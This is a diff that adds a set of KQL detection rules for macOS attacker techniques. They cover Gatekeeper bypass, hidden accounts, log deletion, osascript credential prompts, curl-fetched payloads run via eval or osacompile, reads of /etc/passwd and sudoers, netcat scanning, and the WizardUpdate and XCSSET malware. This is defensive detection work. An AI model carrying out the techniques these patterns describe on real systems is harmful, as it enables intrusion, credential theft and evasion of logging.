+// Level: low
+// Description: Detects macOS Gatekeeper bypass via xattr utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.001
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-d" and ProcessCommandLine contains "com.apple.quarantine") and FolderPath endswith "/xattr"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/guest_account_enabled_via_sysadminctl.kql b/KQL/rules/macos/process_creation/guest_account_enabled_via_sysadminctl.kql
new file mode 100644
index 00000000..20f6e7b1
--- /dev/null
+++ b/KQL/rules/macos/process_creation/guest_account_enabled_via_sysadminctl.kql
@@ -0,0 +1,10 @@
+// Title: Guest Account Enabled Via Sysadminctl
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-02-18
+// Level: low
+// Description: Detects attempts to enable the guest account using the sysadminctl utility
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078, attack.t1078.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -guestAccount" and ProcessCommandLine contains " on") and FolderPath endswith "/sysadminctl"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/gui_input_capture_macos.kql b/KQL/rules/macos/process_creation/gui_input_capture_macos.kql
new file mode 100644
index 00000000..4c4c9582
--- /dev/null
+++ b/KQL/rules/macos/process_creation/gui_input_capture_macos.kql
@@ -0,0 +1,12 @@
+// Title: GUI Input Capture - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Detects attempts to use system dialog prompts to capture user credentials
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.t1056.002
+// False Positives:
+//   - Legitimate administration tools and activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-e" and ProcessCommandLine contains "display" and ProcessCommandLine contains "dialog" and ProcessCommandLine contains "answer") and (ProcessCommandLine contains "admin" or ProcessCommandLine contains "administrator" or ProcessCommandLine contains "authenticate" or ProcessCommandLine contains "authentication" or ProcessCommandLine contains "credentials" or ProcessCommandLine contains "pass" or ProcessCommandLine contains "password" or ProcessCommandLine contains "unlock") and FolderPath endswith "/osascript"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/hidden_flag_set_on_file_directory_via_chflags_macos.kql b/KQL/rules/macos/process_creation/hidden_flag_set_on_file_directory_via_chflags_macos.kql
new file mode 100644
index 00000000..04d4584f
--- /dev/null
+++ b/KQL/rules/macos/process_creation/hidden_flag_set_on_file_directory_via_chflags_macos.kql
@@ -0,0 +1,13 @@
+// Title: Hidden Flag Set On File/Directory Via Chflags - MacOS
+// Author: Omar Khaled (@beacon_exe)
+// Date: 2024-08-21
+// Level: medium
+// Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS.
+// When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
+// False Positives:
+//   - Legitimate usage of chflags by administrators and users.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "hidden " and FolderPath endswith "/chflags"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/hidden_user_creation.kql b/KQL/rules/macos/process_creation/hidden_user_creation.kql
new file mode 100644
index 00000000..b494e414
--- /dev/null
+++ b/KQL/rules/macos/process_creation/hidden_user_creation.kql
@@ -0,0 +1,12 @@
+// Title: Hidden User Creation
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-10
+// Level: medium
+// Description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.002
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "UniqueID" and ProcessCommandLine matches regex "([0-9]|[1-9][0-9]|[1-4][0-9]{2})")) or ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "IsHidden" and (ProcessCommandLine contains "true" or ProcessCommandLine contains "yes" or ProcessCommandLine contains "1")))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/indicator_removal_on_host_clear_mac_system_logs.kql b/KQL/rules/macos/process_creation/indicator_removal_on_host_clear_mac_system_logs.kql
new file mode 100644
index 00000000..32f3bf54
--- /dev/null
+++ b/KQL/rules/macos/process_creation/indicator_removal_on_host_clear_mac_system_logs.kql
@@ -0,0 +1,12 @@
+// Title: Indicator Removal on Host - Clear Mac System Logs
+// Author: remotephone, oscd.community
+// Date: 2020-10-11
+// Level: medium
+// Description: Detects deletion of local audit logs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.002
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and (ProcessCommandLine contains "/var/log" or (ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Logs/"))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/jamf_mdm_execution.kql b/KQL/rules/macos/process_creation/jamf_mdm_execution.kql
new file mode 100644
index 00000000..d9a5780c
--- /dev/null
+++ b/KQL/rules/macos/process_creation/jamf_mdm_execution.kql
@@ -0,0 +1,12 @@
+// Title: JAMF MDM Execution
+// Author: Jay Pandit
+// Date: 2023-08-22
+// Level: low
+// Description: Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Legitimate use of the JAMF CLI tool by IT support and administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "createAccount" or ProcessCommandLine contains "manage" or ProcessCommandLine contains "removeFramework" or ProcessCommandLine contains "removeMdmProfile" or ProcessCommandLine contains "resetPassword" or ProcessCommandLine contains "setComputerName") and FolderPath endswith "/jamf"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/jamf_mdm_potential_suspicious_child_process.kql b/KQL/rules/macos/process_creation/jamf_mdm_potential_suspicious_child_process.kql
new file mode 100644
index 00000000..9016c537
--- /dev/null
+++ b/KQL/rules/macos/process_creation/jamf_mdm_potential_suspicious_child_process.kql
@@ -0,0 +1,12 @@
+// Title: JAMF MDM Potential Suspicious Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly
+
+DeviceProcessEvents
+| where (FolderPath endswith "/bash" or FolderPath endswith "/sh") and InitiatingProcessFolderPath endswith "/jamf"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/jxa_in_memory_execution_via_osascript.kql b/KQL/rules/macos/process_creation/jxa_in_memory_execution_via_osascript.kql
new file mode 100644
index 00000000..7db1cc23
--- /dev/null
+++ b/KQL/rules/macos/process_creation/jxa_in_memory_execution_via_osascript.kql
@@ -0,0 +1,10 @@
+// Title: JXA In-memory Execution Via OSAScript
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects possible malicious execution of JXA in-memory via OSAScript
+// MITRE Tactic: Execution
+// Tags: attack.t1059.002, attack.t1059.007, attack.execution
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -l " and ProcessCommandLine contains "JavaScript") or ProcessCommandLine contains ".js") and (ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "eval" and ProcessCommandLine contains "NSData.dataWithContentsOfURL")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/launch_agent_daemon_execution_via_launchctl.kql b/KQL/rules/macos/process_creation/launch_agent_daemon_execution_via_launchctl.kql
new file mode 100644
index 00000000..20fbc935
--- /dev/null
+++ b/KQL/rules/macos/process_creation/launch_agent_daemon_execution_via_launchctl.kql
@@ -0,0 +1,12 @@
+// Title: Launch Agent/Daemon Execution Via Launchctl
+// Author: Pratinav Chandra
+// Date: 2024-05-13
+// Level: medium
+// Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1569.001, attack.t1543.001, attack.t1543.004
+// False Positives:
+//   - Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "submit" or ProcessCommandLine contains "load" or ProcessCommandLine contains "start") and FolderPath endswith "/launchctl"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/local_groups_discovery_macos.kql b/KQL/rules/macos/process_creation/local_groups_discovery_macos.kql
new file mode 100644
index 00000000..22b775cc
--- /dev/null
+++ b/KQL/rules/macos/process_creation/local_groups_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: Local Groups Discovery - MacOs
+// Author: Ömer Günal, Alejandro Ortuno, oscd.community
+// Date: 2020-10-11
+// Level: informational
+// Description: Detects enumeration of local system groups
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "group") and FolderPath endswith "/dscacheutil") or (ProcessCommandLine contains "/etc/group" and FolderPath endswith "/cat") or ((ProcessCommandLine contains "-list" and ProcessCommandLine contains "/groups") and FolderPath endswith "/dscl")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/local_system_accounts_discovery_macos.kql b/KQL/rules/macos/process_creation/local_system_accounts_discovery_macos.kql
new file mode 100644
index 00000000..f1d6c836
--- /dev/null
+++ b/KQL/rules/macos/process_creation/local_system_accounts_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: Local System Accounts Discovery - MacOs
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-08
+// Level: low
+// Description: Detects enumeration of local systeam accounts on MacOS
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "list" and ProcessCommandLine contains "/users") and FolderPath endswith "/dscl") or ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "user") and FolderPath endswith "/dscacheutil") or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/sudoers") and FolderPath endswith "/cat") or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/macos_network_service_scanning.kql b/KQL/rules/macos/process_creation/macos_network_service_scanning.kql
new file mode 100644
index 00000000..aa75713e
--- /dev/null
+++ b/KQL/rules/macos/process_creation/macos_network_service_scanning.kql
@@ -0,0 +1,12 @@
+// Title: MacOS Network Service Scanning
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-21
+// Level: low
+// Description: Detects enumeration of local or remote network services.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/nc" or FolderPath endswith "/netcat") and (not(ProcessCommandLine contains "l"))) or (FolderPath endswith "/nmap" or FolderPath endswith "/telnet")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/macos_remote_system_discovery.kql b/KQL/rules/macos/process_creation/macos_remote_system_discovery.kql
new file mode 100644
index 00000000..12724578
--- /dev/null
+++ b/KQL/rules/macos/process_creation/macos_remote_system_discovery.kql
@@ -0,0 +1,12 @@
+// Title: Macos Remote System Discovery
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-22
+// Level: informational
+// Description: Detects the enumeration of other remote systems.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/macos_scripting_interpreter_applescript.kql b/KQL/rules/macos/process_creation/macos_scripting_interpreter_applescript.kql
new file mode 100644
index 00000000..9a99227f
--- /dev/null
+++ b/KQL/rules/macos/process_creation/macos_scripting_interpreter_applescript.kql
@@ -0,0 +1,12 @@
+// Title: MacOS Scripting Interpreter AppleScript
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-21
+// Level: medium
+// Description: Detects execution of AppleScript of the macOS scripting language AppleScript.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002
+// False Positives:
+//   - Application installers might contain scripts as part of the installation process.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -e " or ProcessCommandLine contains ".scpt" or ProcessCommandLine contains ".js") and FolderPath endswith "/osascript"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/network_sniffing_macos.kql b/KQL/rules/macos/process_creation/network_sniffing_macos.kql
new file mode 100644
index 00000000..0bcd2c9c
--- /dev/null
+++ b/KQL/rules/macos/process_creation/network_sniffing_macos.kql
@@ -0,0 +1,13 @@
+// Title: Network Sniffing - MacOs
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-14
+// Level: informational
+// Description: Detects the usage of tooling to sniff network traffic.
+// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/tcpdump" or FolderPath endswith "/tshark"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
new file mode 100644
index 00000000..44599194
--- /dev/null
+++ b/KQL/rules/macos/process_creation/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
@@ -0,0 +1,13 @@
+// Title: New File Exclusion Added To Time Machine Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility.
+// An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+//   - Legitimate administrator activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "addexclusion" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/osacompile_execution_by_potentially_suspicious_applet_osascript.kql b/KQL/rules/macos/process_creation/osacompile_execution_by_potentially_suspicious_applet_osascript.kql
new file mode 100644
index 00000000..1c14712e
--- /dev/null
+++ b/KQL/rules/macos/process_creation/osacompile_execution_by_potentially_suspicious_applet_osascript.kql
@@ -0,0 +1,10 @@
+// Title: Osacompile Execution By Potentially Suspicious Applet/Osascript
+// Author: Sohan G (D4rkCiph3r), Red Canary (Idea)
+// Date: 2023-04-03
+// Level: medium
+// Description: Detects potential suspicious applet or osascript executing "osacompile".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "osacompile" and (InitiatingProcessFolderPath endswith "/applet" or InitiatingProcessFolderPath endswith "/osascript")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/osacompile_run_only_execution.kql b/KQL/rules/macos/process_creation/osacompile_run_only_execution.kql
new file mode 100644
index 00000000..1e7dd6f2
--- /dev/null
+++ b/KQL/rules/macos/process_creation/osacompile_run_only_execution.kql
@@ -0,0 +1,10 @@
+// Title: OSACompile Run-Only Execution
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects potential suspicious run-only executions compiled using OSACompile
+// MITRE Tactic: Execution
+// Tags: attack.t1059.002, attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains " -x " and ProcessCommandLine contains " -e "
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/payload_decoded_and_decrypted_via_built_in_utilities.kql b/KQL/rules/macos/process_creation/payload_decoded_and_decrypted_via_built_in_utilities.kql
new file mode 100644
index 00000000..b3683b8c
--- /dev/null
+++ b/KQL/rules/macos/process_creation/payload_decoded_and_decrypted_via_built_in_utilities.kql
@@ -0,0 +1,10 @@
+// Title: Payload Decoded and Decrypted via Built-in Utilities
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
+// MITRE Tactic: Execution
+// Tags: attack.t1059, attack.t1204, attack.execution, attack.t1140, attack.defense-evasion, attack.s0482, attack.s0402
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Volumes/" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "-base64" and ProcessCommandLine contains " -d ") and FolderPath endswith "/openssl"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/potential_base64_decoded_from_images.kql b/KQL/rules/macos/process_creation/potential_base64_decoded_from_images.kql
new file mode 100644
index 00000000..2dc301ff
--- /dev/null
+++ b/KQL/rules/macos/process_creation/potential_base64_decoded_from_images.kql
@@ -0,0 +1,10 @@
+// Title: Potential Base64 Decoded From Images
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: high
+// Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "base64" and ProcessCommandLine contains "-d" and ProcessCommandLine contains ">") and (ProcessCommandLine contains ".avif" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jfif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".pjp" or ProcessCommandLine contains ".pjpeg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".svg" or ProcessCommandLine contains ".webp") and FolderPath endswith "/bash" and (ProcessCommandLine contains "tail" and ProcessCommandLine contains "-c")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/potential_discovery_activity_using_find_macos.kql b/KQL/rules/macos/process_creation/potential_discovery_activity_using_find_macos.kql
new file mode 100644
index 00000000..79eb20d4
--- /dev/null
+++ b/KQL/rules/macos/process_creation/potential_discovery_activity_using_find_macos.kql
@@ -0,0 +1,10 @@
+// Title: Potential Discovery Activity Using Find - MacOS
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects usage of "find" binary in a suspicious manner to perform discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/potential_in_memory_download_and_compile_of_payloads.kql b/KQL/rules/macos/process_creation/potential_in_memory_download_and_compile_of_payloads.kql
new file mode 100644
index 00000000..50020784
--- /dev/null
+++ b/KQL/rules/macos/process_creation/potential_in_memory_download_and_compile_of_payloads.kql
@@ -0,0 +1,10 @@
+// Title: Potential In-Memory Download And Compile Of Payloads
+// Author: Sohan G (D4rkCiph3r), Red Canary (idea)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1059.007, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains "curl"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/potential_persistence_via_plistbuddy.kql b/KQL/rules/macos/process_creation/potential_persistence_via_plistbuddy.kql
new file mode 100644
index 00000000..d1ccd685
--- /dev/null
+++ b/KQL/rules/macos/process_creation/potential_persistence_via_plistbuddy.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via PlistBuddy
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-02-18
+// Level: high
+// Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.001, attack.t1543.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "LaunchAgents" or ProcessCommandLine contains "LaunchDaemons") and (ProcessCommandLine contains "RunAtLoad" and ProcessCommandLine contains "true") and FolderPath endswith "/PlistBuddy"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/potential_wizardupdate_malware_infection.kql b/KQL/rules/macos/process_creation/potential_wizardupdate_malware_infection.kql
new file mode 100644
index 00000000..4f983d37
--- /dev/null
+++ b/KQL/rules/macos/process_creation/potential_wizardupdate_malware_infection.kql
@@ -0,0 +1,10 @@
+// Title: Potential WizardUpdate Malware Infection
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-17
+// Level: high
+// Description: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "=$(curl " and ProcessCommandLine contains "eval") and FolderPath endswith "/sh") or (ProcessCommandLine contains "_intermediate_agent_" and FolderPath endswith "/curl")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/potential_xcsset_malware_infection.kql b/KQL/rules/macos/process_creation/potential_xcsset_malware_infection.kql
new file mode 100644
index 00000000..4669dddd
--- /dev/null
+++ b/KQL/rules/macos/process_creation/potential_xcsset_malware_infection.kql
@@ -0,0 +1,10 @@
+// Title: Potential XCSSET Malware Infection
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-17
+// Level: medium
+// Description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "/sys/log.php" or ProcessCommandLine contains "/sys/prepod.php" or ProcessCommandLine contains "/sys/bin/Pods") and FolderPath endswith "/curl" and InitiatingProcessFolderPath endswith "/bash") and ProcessCommandLine contains "https://") or (((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/osacompile" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "LSUIElement" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/plutil" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "-r" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/zip"))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/remote_access_tool_potential_meshagent_execution_macos.kql b/KQL/rules/macos/process_creation/remote_access_tool_potential_meshagent_execution_macos.kql
new file mode 100644
index 00000000..1235b69b
--- /dev/null
+++ b/KQL/rules/macos/process_creation/remote_access_tool_potential_meshagent_execution_macos.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - Potential MeshAgent Execution - MacOS
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: medium
+// Description: Detects potential execution of MeshAgent which is a tool used for remote access.
+// Historical data shows that threat actors rename MeshAgent binary to evade detection.
+// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Environments that legitimately use MeshAgent
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--meshServiceName"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/remote_access_tool_renamed_meshagent_execution_macos.kql b/KQL/rules/macos/process_creation/remote_access_tool_renamed_meshagent_execution_macos.kql
new file mode 100644
index 00000000..fcbfb0f9
--- /dev/null
+++ b/KQL/rules/macos/process_creation/remote_access_tool_renamed_meshagent_execution_macos.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - Renamed MeshAgent Execution - MacOS
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: high
+// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.
+// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.
+// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not((FolderPath endswith "/meshagent" or FolderPath endswith "/meshagent_osx64")))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/remote_access_tool_team_viewer_session_started_on_macos_host.kql b/KQL/rules/macos/process_creation/remote_access_tool_team_viewer_session_started_on_macos_host.kql
new file mode 100644
index 00000000..4064ad86
--- /dev/null
+++ b/KQL/rules/macos/process_creation/remote_access_tool_team_viewer_session_started_on_macos_host.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - Team Viewer Session Started On MacOS Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+//   - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/root_account_enable_via_dsenableroot.kql b/KQL/rules/macos/process_creation/root_account_enable_via_dsenableroot.kql
new file mode 100644
index 00000000..d632a175
--- /dev/null
+++ b/KQL/rules/macos/process_creation/root_account_enable_via_dsenableroot.kql
@@ -0,0 +1,10 @@
+// Title: Root Account Enable Via Dsenableroot
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects attempts to enable the root account via "dsenableroot"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1078, attack.t1078.001, attack.t1078.003, attack.initial-access, attack.persistence
+
+DeviceProcessEvents
+| where FolderPath endswith "/dsenableroot" and (not(ProcessCommandLine contains " -d "))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/scheduled_cron_task_job_macos.kql b/KQL/rules/macos/process_creation/scheduled_cron_task_job_macos.kql
new file mode 100644
index 00000000..639e1618
--- /dev/null
+++ b/KQL/rules/macos/process_creation/scheduled_cron_task_job_macos.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Cron Task/Job - MacOs
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/crontab"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/screen_capture_macos.kql b/KQL/rules/macos/process_creation/screen_capture_macos.kql
new file mode 100644
